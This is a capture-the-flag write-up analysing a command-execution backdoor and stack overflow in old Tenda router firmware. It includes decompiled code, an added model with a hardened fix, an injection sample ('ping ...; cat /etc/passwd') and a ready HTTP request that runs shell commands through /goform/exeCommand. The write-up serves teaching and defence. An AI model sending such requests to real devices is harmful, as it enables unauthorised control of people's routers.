[Original] 绿城杯 (Lvcheng Cup) innovative challenge Route-Stack solution (Tenda router vulnerability hunting)

Posted on: 2021-9-30 14:52
Firmware analysis

This challenge is fairly easy. The target is a Tenda router with a rather old firmware, version V15.03.05.16_CN. Download the firmware from the official site, unpack it, and analyze it.

Since the Tenda router bugs I found previously were all in httpd, I audited the httpd code first. All the routes are registered in the function shown in the figure below, so it is enough to audit the handlers directly.

It is easy to see that several functions are vulnerable, and the firmware also contains a suspicious backdoor: the formexeCommand function executes arbitrary commands (fortunately, newer firmware has removed this function).

This function has two problems: a stack overflow (an unbounded strcpy of the cmdinput parameter into a 512-byte stack buffer) and shell command execution (the user-controlled string is passed straight into doSystemCmd).
```c
int __fastcall formexeCommand(int a1)
{
  size_t v1;        // r0
  char v4[4096];    // [sp+10h]   [bp-231Ch] BYREF   one line read back from /tmp/cmdTmp.txt
  char v5[4096];    // [sp+1010h] [bp-131Ch] BYREF   accumulated command output
  char s1[256];     // [sp+2010h] [bp-31Ch]  BYREF   first word of the command (the "verb")
  char s[512];      // [sp+2110h] [bp-21Ch]  BYREF   copy of cmdinput: only 512 bytes
  size_t n;         // [sp+2310h] [bp-1Ch]
  FILE *stream;     // [sp+2314h] [bp-18h]
  char *src;        // [sp+2318h] [bp-14h]
  int v11;          // [sp+231Ch] [bp-10h]

  memset(s, 0, sizeof(s));
  memset(s1, 0, sizeof(s1));
  memset(v5, 0, sizeof(v5));
  memset(v4, 0, sizeof(v4));
  v11 = 0;
  src = (char *)sub_2B7C4(a1, "cmdinput", &unk_E27E0);   // fetch the cmdinput POST parameter
  strcpy(s, src);                                        // bug 1: no length check, stack overflow
  sub_7B098(s1, s);                                      // presumably copies the first word into s1
  if ( !strcmp(s1, "cd") )
  {
    v1 = strlen(path_buf);
    sub_7B178(path_buf, s, v1);
    doSystemCmd("echo %s > /tmp/cmdTmp.txt", path_buf);
  }
  else if ( !strcmp(s1, "ls") || !strcmp(s1, "cat") )
  {
    sub_7ADC4(s);
    doSystemCmd("%s > /tmp/cmdTmp.txt", s);              // bug 2: user input goes to the shell
  }
  else if ( !strcmp(s1, "echo") )
  {
    sub_7AAEC(s);
    doSystemCmd("%s", s);
  }
  else if ( !strcmp(s1, "pwd") )
  {
    doSystemCmd("echo %s > /tmp/cmdTmp.txt", path_buf);
  }
  else if ( !strcmp(s1, "ping") )
  {
    doSystemCmd("%s -c 3 > /tmp/cmdTmp.txt", s);
  }
  else
  {
    doSystemCmd("%s > /tmp/cmdTmp.txt", s);              // any other verb is run as-is
  }
  stream = fopen("/tmp/cmdTmp.txt", "r");
  if ( !stream )
    return puts("formexeCommand:open file error!");
  while ( 1 )
  {
    memset(v4, 0, sizeof(v4));
    if ( !fgets(v4, 4096, stream) )
      break;
    n = strlen(v4);
    if ( v11 + n + 1 > 0x1000 )
      break;
    memcpy(&v5[v11], v4, n);
    v11 += n;
  }
  fclose(stream);
  sub_2C144(a1, "%s", v5);                               // command output is sent back in the response
  return sub_2C68C(a1, 200);
}
```
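To make both defects concrete, here is an added C model of formexeCommand's dispatch logic beside a hardened variant. This is example code written for this write-up, not code from the original post or from the Tenda firmware. The function names cmdinput_overflows(), vulnerable_shell_line() and safe_argv() are assumptions; path_buf (the working directory the firmware tracks for cd/pwd) and the helpers sub_7B098/sub_7ADC4/sub_7AAEC are not reimplemented. The vulnerable model only builds the string that would reach doSystemCmd and never executes it, so it is safe to run.

```c
/* Added example: model of the two bugs in formexeCommand and a hardened
 * handler.  Not firmware code; helper names are assumptions. */
#include <stdio.h>
#include <string.h>

#define CMD_BUF 512   /* sizeof(s) in the decompiled function */
#define MAX_ARGS 8

/* Bug 1: strcpy(s, src) is unbounded.  The overflow threshold is computed
 * here rather than triggered: cmdinput of 512 bytes or more (plus the NUL)
 * runs past `s` into the saved registers. */
int cmdinput_overflows(const char *cmdinput)
{
    return strlen(cmdinput) + 1 > CMD_BUF;
}

/* First whitespace-delimited word, the role sub_7B098 appears to play. */
static void first_word(char *dst, size_t dstsz, const char *src)
{
    size_t i = 0;
    while (src[i] && src[i] != ' ' && i + 1 < dstsz) {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
}

/* Bug 2: reproduce the command line the firmware hands to doSystemCmd() for
 * a given cmdinput.  Nothing is executed; the string is returned in `out`
 * so the injection is visible.  path_buf is shown as a placeholder. */
const char *vulnerable_shell_line(const char *cmdinput, char *out, size_t outsz)
{
    char verb[64];
    first_word(verb, sizeof verb, cmdinput);

    if (!strcmp(verb, "cd") || !strcmp(verb, "pwd"))
        snprintf(out, outsz, "echo %s > /tmp/cmdTmp.txt", "<path_buf>");
    else if (!strcmp(verb, "echo"))
        snprintf(out, outsz, "%s", cmdinput);
    else if (!strcmp(verb, "ping"))
        snprintf(out, outsz, "%s -c 3 > /tmp/cmdTmp.txt", cmdinput);
    else  /* ls, cat and every unrecognised verb go straight to the shell */
        snprintf(out, outsz, "%s > /tmp/cmdTmp.txt", cmdinput);
    return out;
}

/* Hardened variant: bounded length, verb allow-list, no shell
 * metacharacters, and an argv vector meant for execvp() instead of a format
 * string for system().  Returns argc, or -1 if the input is rejected. */
int safe_argv(const char *cmdinput, char *buf, size_t bufsz,
              char *argv[], size_t maxargs)
{
    static const char *allowed[] = { "ls", "cat", "pwd", "echo", "ping" };
    static const char bad[] = ";|&$`<>()\n\r'\"\\";
    size_t len = strlen(cmdinput);
    int argc = 0, ok = 0;

    if (len == 0 || len + 1 > bufsz)       /* fixes bug 1: bounded copy */
        return -1;
    if (strpbrk(cmdinput, bad))            /* fixes bug 2: no shell syntax */
        return -1;
    memcpy(buf, cmdinput, len + 1);

    for (char *tok = strtok(buf, " "); tok; tok = strtok(NULL, " ")) {
        if ((size_t)argc + 1 >= maxargs)   /* keep room for the NULL terminator */
            return -1;
        argv[argc++] = tok;
    }
    if (argc == 0)
        return -1;

    for (size_t i = 0; i < sizeof allowed / sizeof *allowed; i++)
        if (!strcmp(argv[0], allowed[i]))
            ok = 1;
    if (!ok)
        return -1;

    if (!strcmp(argv[0], "ping")) {        /* keep the firmware's -c 3 limit */
        if ((size_t)argc + 3 > maxargs)
            return -1;
        argv[argc++] = "-c";
        argv[argc++] = "3";
    }
    argv[argc] = NULL;                     /* ready for execvp(argv[0], argv) */
    return argc;
}

int main(void)
{
    char line[1024], buf[CMD_BUF], *argv[MAX_ARGS];
    const char *probes[] = {               /* constructed sample inputs */
        "cat /home/flag.txt",              /* the request from the write-up */
        "ping 127.0.0.1; cat /etc/passwd", /* injection through the ping branch */
        "id",                              /* unknown verb: still reaches the shell */
    };
    for (size_t i = 0; i < 3; i++) {
        printf("shell sees: %s\n", vulnerable_shell_line(probes[i], line, sizeof line));
        printf("hardened  : argc=%d\n", safe_argv(probes[i], buf, sizeof buf, argv, MAX_ARGS));
    }
    return 0;
}
```

Running the model shows why the write-up's request works: "cat /home/flag.txt" is not altered on its way to the shell, and an unknown verb such as "id" is still executed by the default branch. The hardened handler rejects the same inputs at the length check, the metacharacter check or the allow-list, and hands an argv to execvp so no shell is involved at all.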
Exploitation

Just send the request from Firefox: any verb that is not specially handled falls into the default branch and is executed by the shell, its output is written to /tmp/cmdTmp.txt, and the function reads that file back into the response. So run shell commands to locate the flag, then cat it out.
```http
POST /goform/exeCommand HTTP/1.1
Host: 1.13.168.92
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://1.13.168.92/mac_filter.html?random=0.8789105901190445&
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 27
Origin: http://1.13.168.92
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmdinput=cat /home/flag.txt
```